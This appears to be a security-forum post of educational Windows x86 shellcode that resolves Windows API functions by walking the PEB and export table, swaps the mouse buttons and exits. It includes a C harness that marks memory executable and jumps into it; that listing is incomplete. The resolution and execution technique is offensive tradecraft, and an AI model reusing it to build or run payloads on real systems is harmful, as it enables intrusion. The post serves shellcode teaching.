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[RST] Windows x86 SwapMouseButton shellcode

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Windows x86 SwapMouseButton shellcode


	Title: Windows x86 SwapMouseButton shellcode
	Author: Ionut Popescu
	Date: December 2015
	Tested on: Windows 7/Windows 10
	Build/Run: Visual C++ Express Edition
	Shellcode written for educational purposes. Detailed description:
	- http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/
	- http://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/
	- http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/


; Shellcode details
; -----------------

xor ecx, ecx
mov eax, fs:[ecx + 0x30] ; EAX = PEB
mov eax, [eax + 0xc]     ; EAX = PEB->Ldr
mov esi, [eax + 0x14]    ; ESI = PEB->Ldr.InMemOrder
lodsd                    ; EAX = Second module
xchg eax, esi            ; EAX = ESI, ESI = EAX
lodsd                    ; EAX = Third(kernel32)
mov ebx, [eax + 0x10]    ; EBX = Base address
mov edx, [ebx + 0x3c]    ; EDX = DOS->e_lfanew
add edx, ebx             ; EDX = PE Header
mov edx, [edx + 0x78]    ; EDX = Offset export table
add edx, ebx             ; EDX = Export table
mov esi, [edx + 0x20]    ; ESI = Offset namestable
add esi, ebx             ; ESI = Names table
xor ecx, ecx             ; EXC = 0
inc ecx                              ; Increment the ordinal
lodsd                                ; Get name offset
add eax, ebx                         ; Get function name
cmp dword ptr[eax], 0x50746547       ; GetP
jnz Get_Function
cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
jnz Get_Function
cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
jnz Get_Function
mov esi, [edx + 0x24]                ; ESI = Offset ordinals
add esi, ebx                         ; ESI = Ordinals table
mov cx, [esi + ecx * 2]              ; Number of function
dec ecx
mov esi, [edx + 0x1c]                ; Offset address table
add esi, ebx                         ; ESI = Address table
mov edx, [esi + ecx * 4]             ; EDX = Pointer(offset)
add edx, ebx                         ; EDX = GetProcAddress
xor ecx, ecx    ; ECX = 0
push ebx        ; Kernel32 base address
push edx        ; GetProcAddress
push ecx        ; 0
push 0x41797261 ; aryA
push 0x7262694c ; Libr
push 0x64616f4c ; Load
push esp        ; "LoadLibrary"
push ebx        ; Kernel32 base address
call edx        ; GetProcAddress(LL)
add esp, 0xc    ; pop "LoadLibrary"
pop ecx         ; ECX = 0
push eax        ; EAX = LoadLibrary
push ecx
mov cx, 0x6c6c  ; ll
push ecx
push 0x642e3233 ; 32.d
push 0x72657375 ; user
push esp        ; "user32.dll"
call eax        ; LoadLibrary("user32.dll")
add esp, 0x10                  ; Clean stack
mov edx, [esp + 0x4]           ; EDX = GetProcAddress
xor ecx, ecx                   ; ECX = 0
push ecx
mov ecx, 0x616E6F74            ; tona
push ecx
sub dword ptr[esp + 0x3], 0x61 ; Remove "a"
push 0x74754265                ; eBut
push 0x73756F4D                ; Mous
push 0x70617753                ; Swap
push esp                       ; "SwapMouseButton"
push eax                       ; user32.dll address
call edx                       ; GetProc(SwapMouseButton)
add esp, 0x14 ; Cleanup stack
xor ecx, ecx  ; ECX = 0
inc ecx       ; true
push ecx      ; 1
call eax      ; Swap!
add esp, 0x4                    ; Clean stack
pop edx                         ; GetProcAddress
pop ebx                         ; kernel32.dll base address
mov ecx, 0x61737365             ; essa
push ecx
sub dword ptr [esp + 0x3], 0x61 ; Remove "a"
push 0x636f7250                 ; Proc
push 0x74697845                 ; Exit
push esp
push ebx                        ; kernel32.dll base address
call edx                        ; GetProc(Exec)
xor ecx, ecx                    ; ECX = 0
push ecx                        ; Return code = 0
call eax                        ; ExitProcess


#include "stdafx.h"
#include <Windows.h>
int main()
    char *shellcode =
    "\x41" // inc ecx - Remove this to restore the functionality
    // Set memory as executable
    DWORD old = 0;
    BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old);
    // Call the shellcode
        jmp shellcode;
    return 0;


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